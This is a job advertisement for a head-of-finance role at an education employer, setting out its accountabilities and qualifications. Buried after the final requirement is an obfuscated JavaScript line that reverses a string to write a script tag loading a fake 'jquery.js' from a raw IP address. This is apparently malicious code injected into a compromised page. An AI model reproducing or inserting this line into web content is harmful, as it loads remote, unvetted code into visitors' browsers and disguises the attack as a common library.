Industry : Education
Report to : General Manager of Corporate Services
Term : 2 year contract
General Job Accountabilities:
Responsible for the overall leadership and oversight of the following Finance areas:
– Reporting – Preparation of financial statements, audit
– Planning – Budget, treasury management
– Corporate Finance
– Accounts Payable
– Accounts Receivable
– Corporate tax management
– Overseeing the preparation company yearly budget and cash flow
– Monitor and take action on project financial performance review, monitor budget and cost of projects and overheads.
– Prepare commercial pricing strategy and pricing element for all revenue streams
– Responsible for overall accounting and financial recordings, financial reporting, development and implementation of internal control and procedure compliance.
– Responsible for cost-control, financial analysis and fund management, including credit control.
– Supervise the preparation of the monthly accounts to facilitate internal and external reporting and in accordance with respective applicable legal compliance with local authorities.
– Oversee the appropriate compliance to procurement procedures and enable risk management and efficiency of procurement processes
– Monitor annual budgets and monthly forecasts vs. actual performance.
– Manage treasury matters including trade & project finances and operational cash flow requirements.
– Responsible for tax compliance and reporting, management of audits, budgeting, process and implementation, and financial system upgrade.
– Responsible for tax planning and administration in ensuring that an efficient and effective tax structure is in place.
– Manage the financial and statutory audits process.
– Take a lead role in developing and improving standard operation procedures, business process and procedures.
– Monitor KPIs and produce variance analysis and recommend timely corrective actions.
– Monitor and address accuracy of financial reports and accounting data entries
– Implement asset monitoring & control and asset/equipment tracking. Conduct quarterly asset tracking & equipment audit.
– Development and improve financial controls and policy and ensure implementation and compliance throughout the company & subsidiaries.
– Control financial activities and ensure timely reporting, work includes audit and establish policies & procedures.
– Drive and manage change processes in meeting organization objectives.
– Provide training and mentoring for the team and staff development.
– Other tasks and responsibilities assigned from time to time.
– Minimum Degree in Accounting
– Professional qualification in Finance or equivalent (eg MIA, ACCA, CIMA)
– More than 10 years working experience in Managing Finance & Account Dept. in various industries.
– In depth knowledge of Accounting, Finance and Taxation.
– Competent in managing financial systems and excellent in fundamental ICT applications (eg. Microsoft Office)
– Self-motivated and able to perform well under tight deadlines.
– Competent in financial analysis, budgeting and financial reporting.
– Excellent planning, analytical, interpersonal and communication skills.
– Good problems solving and decision making skills with strong interpersonal and communication skills.
– Excellent planning, attentive to details, organized and thorough with desire for continuous improvements. document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))
To apply for this job email your details to email@example.com